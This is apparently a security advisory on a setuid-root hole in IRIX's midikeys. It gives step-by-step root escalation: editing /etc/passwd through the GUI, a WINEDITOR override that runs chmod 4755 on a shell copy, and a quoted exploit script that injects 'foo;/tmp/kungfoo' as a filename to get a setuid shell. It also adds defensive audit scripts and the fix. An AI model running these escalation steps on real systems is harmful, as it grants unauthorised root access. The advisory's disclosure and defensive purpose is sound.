COMMAND

    midikeys

SYSTEMS AFFECTED

    IRIX 6.2, 6.3, 6.5, 6.5.3

PROBLEM

    Larry W. Cashdollar found the following (tested on IRIX64 devel 6.5
    05190004).  The setuid root binary midikeys can be used to read any
    file on the system through its GUI interface.  It can also be used
    to edit any file on the system.  One can get from guest account
    access to root access using the following procedure.

    1) Choose an unpassworded account and telnet in (like guest or lp)

        devel 25% id
        uid=998 gid=998(guest)

    2) Execute the midikeys application with DISPLAY set to your host

        devel 26% ./midikeys
        devel 27% Xlib:  extension "GLX" missing on display "grinch:0.0".
        Xlib:  extension "GLX" missing on display "grinch:0.0".

    3) In the midikeys window click sounds and then midi songs.  This
       will open a file manager type interface.

    4) You can enter the path and filename of any file you wish to read,
       including root-owned files with group/world read/write
       permissions unset.

    5) If you select a file like "/usr/share/data/music/README" it will
       appear in a text editor.  Use the text editor to open /etc/passwd
       and make modifications at will.  Save and enjoy.

    So, you can remove the '*' from sysadm...

        $ su sysadm
        # id
        uid=0(root) gid=0(sys)

        devel 28%  ls -l /usr/sbin/midikeys
        -rwsr-xr-x    1 root     root      218712 Jan 10 17:19 /usr/sbin/midikeys

    You just need an account to gain root privileges; it's not limited
    to the unpassworded accounts, any normal user could use this
    exploit.  This was verified to work on an O2 running IRIX 6.3 (IRIX
    o2 6.3 O2 R10000 12161207 IP32) and on an Octane running IRIX 6.5.3
    (IRIX64 octane 6.5 6.5.3m 01221553 IP30).  It seems that whether you
    use vi or some other editor makes a difference.  So far, vi won't
    work, but if you open an X11 editor (gvim), it will run as root, and
    you will be able to edit anything, again...  In the end, it turns
    out that one does not need any particular text editor to exploit the
    vulnerability.  That's because of a nice "feature" of the desktop
    environment variable WINEDITOR that can be set to any system
    command, e.g., "/bin/chmod 4755 /tmp/bsh" (where /tmp/bsh is just a
    root-owned copy of the Bourne shell).  This can be done on both IRIX
    6.2 (e.g., using toolchest -> Desktop -> Customize -> Desktop ->
    Default Editor: Other...) and on IRIX 6.5 (toolchest -> Desktop ->
    Customize -> Utilities -> Text Editor: Other...).  After setting
    WINEDITOR (which can be verified by inspecting
    ~/.desktop-hostname/desktopenv) the exploit follows the well-known
    path by running midikeys, opening a file manager, etc.
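    As a defender-side check for the WINEDITOR abuse described above,
    here is an added example in POSIX shell; it is not part of the
    original advisory and is not SGI code.  It flags a WINEDITOR value
    whose command is not a known editor or that carries shell
    metacharacters, and scans a desktopenv file for such an override.
    The allowlist of editor names, and the assumption that desktopenv
    stores one NAME=VALUE per line, are this example's own assumptions;
    adjust both for your site.

```shell
#!/bin/sh
# Added example: audit WINEDITOR overrides on an IRIX desktop.
# Assumed allowlist of editor basenames (extend for your site).
EDITOR_ALLOWLIST="vi vim gvim jot xedit"

# editor_allowed VALUE
# Returns 0 if VALUE looks like a plain editor invocation: no shell
# metacharacters, and the command's basename is on EDITOR_ALLOWLIST.
# Returns 1 for anything else (e.g. "/bin/chmod 4755 /tmp/bsh").
editor_allowed() {
    value=$1
    case "$value" in
        *';'*|*'|'*|*'&'*|*'`'*|*'$('*|*'>'*|*'<'*) return 1 ;;
    esac
    # the first whitespace-separated word is the command
    cmd=$(printf '%s\n' "$value" | awk '{ print $1 }')
    [ -n "$cmd" ] || return 1
    base=$(basename "$cmd")
    for e in $EDITOR_ALLOWLIST; do
        if [ "$base" = "$e" ]; then
            return 0
        fi
    done
    return 1
}

# scan_desktopenv FILE
# Assumes FILE holds one NAME=VALUE per line (an assumption about the
# desktopenv format).  Prints a warning and returns 1 when WINEDITOR is
# set to something editor_allowed rejects; returns 0 otherwise.
scan_desktopenv() {
    file=$1
    val=$(sed -n 's/^WINEDITOR=//p' "$file" | tail -n 1)
    if [ -z "$val" ]; then
        return 0     # no override present
    fi
    if editor_allowed "$val"; then
        return 0
    fi
    printf 'WARNING: suspicious WINEDITOR in %s: %s\n' "$file" "$val" >&2
    return 1
}

# Usage: sh winedit_audit.sh /home/*/.desktop-*/desktopenv
if [ $# -gt 0 ]; then
    rc=0
    for f in "$@"; do
        scan_desktopenv "$f" || rc=1
    done
    exit $rc
fi
```

    Run it as root over every user's desktopenv so that an override
    pointing at chmod, cp or a shell is reported before midikeys ever
    hands that command root privileges.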

    A similar approach to exploiting this vulnerability was given by
    Loneguard:

        #!/bin/sh
        #
        # Irix 6.x soundplayer xploit - Loneguard 20/02/99
        #
        # Good example of how bad coding in a non-setuid/privileged process
        # can offer up rewt
        #
        cat > /tmp/crazymonkey.c << 'EOF'
        #include <stdlib.h>
        #include <unistd.h>

        int main(void) {
            setuid(0);
            system("cp /bin/csh /tmp/xsh;chmod 4755 /tmp/xsh");
            return 0;
        }
        EOF
        cc -o /tmp/kungfoo /tmp/crazymonkey.c   # source path matches the heredoc above
        /usr/sbin/midikeys &
        echo "You should now see the midikeys window, go to the menu that allows you to play sounds and load a wav. This will bring up a soundplayer window. Save the wav as 'foo;/tmp/kungfoo' and go find a rewt shell in tmp"

    This works fine on IRIX 6.4 here... although some people had to
    change csh to sh... csh returned permission denied, 4755 and all.
    The problem here is that various csh's won't run setuid-root scripts
    unless you specify (I think) the -b flag.  From the Solaris csh man
    page:

    ...
         -b        Force a "break" from option processing. Subsequent
                   command  line  arguments  are not interpreted as C
                   shell options. This allows the passing of  options
                   to  a script without confusion. The shell does not
                   run set-user-ID  or  set-group-ID  scripts  unless
                   this option is present.
    ...

    Then again, maybe it was done deliberately to foil script kiddies.

SOLUTION

    Unpassworded account?  That's a known (and documented) feature on
    IRIX systems.  The first thing you do when you unpack an IRIX box:
    set a root password and disable the open accounts (EZsetup,
    OutOfBox, lp, guest, 4Dgifts, sgiweb).  There's even an entry in the
    "System manager" to do it.  Remove the setuid bit from midikeys.

    After a chmod u-s midikeys, midikeys still works, at least after a
    very quick test.  However, removal of the setuid permission disables
    functionality that is not implemented or utilized at this time.  So,
    as root:

        % ls -la /usr/sbin/midikeys
        -rwsr-xr-x 1 root sys  218712 Mar  8 14:57 /usr/sbin/midikeys

        % /bin/su -
        #

        # /bin/chmod 555 /usr/sbin/midikeys

        # ls -la /usr/sbin/midikeys
        -r-xr-xr-x 1 root sys  218712 May  20 13:57 /usr/sbin/midikeys
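
    The same fix, scripted as a repeatable check: an added example in
    POSIX shell that is not from the advisory and not from SGI.  It
    detects the setuid bit on a path, lists setuid files under a
    directory (optionally only those owned by a given user), and removes
    the bit while verifying the result.  The path /usr/sbin/midikeys is
    the one from the advisory; the function names and the ls/find
    parsing are this example's own.

```shell
#!/bin/sh
# Added example: find and strip setuid bits, verifying the result.

# is_setuid PATH -> 0 if the setuid bit is set, 1 otherwise.
# Reads the owner-execute column of ls -ld ("s" or "S"), which any
# POSIX ls prints, IRIX included.
is_setuid() {
    mode=$(ls -ld "$1" 2>/dev/null | cut -c4)
    case "$mode" in
        s|S) return 0 ;;
        *)   return 1 ;;
    esac
}

# find_setuid DIR [OWNER] -> prints regular files under DIR with the
# setuid bit set; with OWNER given, only those owned by OWNER.
find_setuid() {
    if [ -n "$2" ]; then
        find "$1" -type f -user "$2" -perm -4000 -print 2>/dev/null
    else
        find "$1" -type f -perm -4000 -print 2>/dev/null
    fi
}

# strip_setuid PATH -> chmod u-s, then re-check; returns 0 only if the
# bit is really gone (a failed chmod or a still-set bit both return 1).
strip_setuid() {
    chmod u-s "$1" || return 1
    if is_setuid "$1"; then
        return 1
    fi
    return 0
}

# Usage (as root): sh setuid_audit.sh /usr/sbin
# Lists root-owned setuid files under the directory; the advisory's fix
# is then:  strip_setuid /usr/sbin/midikeys
if [ $# -gt 0 ]; then
    find_setuid "$1" root
fi
```

    Listing every root-owned setuid file first is worth the extra
    minute: midikeys is the binary this advisory names, but the same
    review catches any other setuid program that was never meant to
    carry the bit.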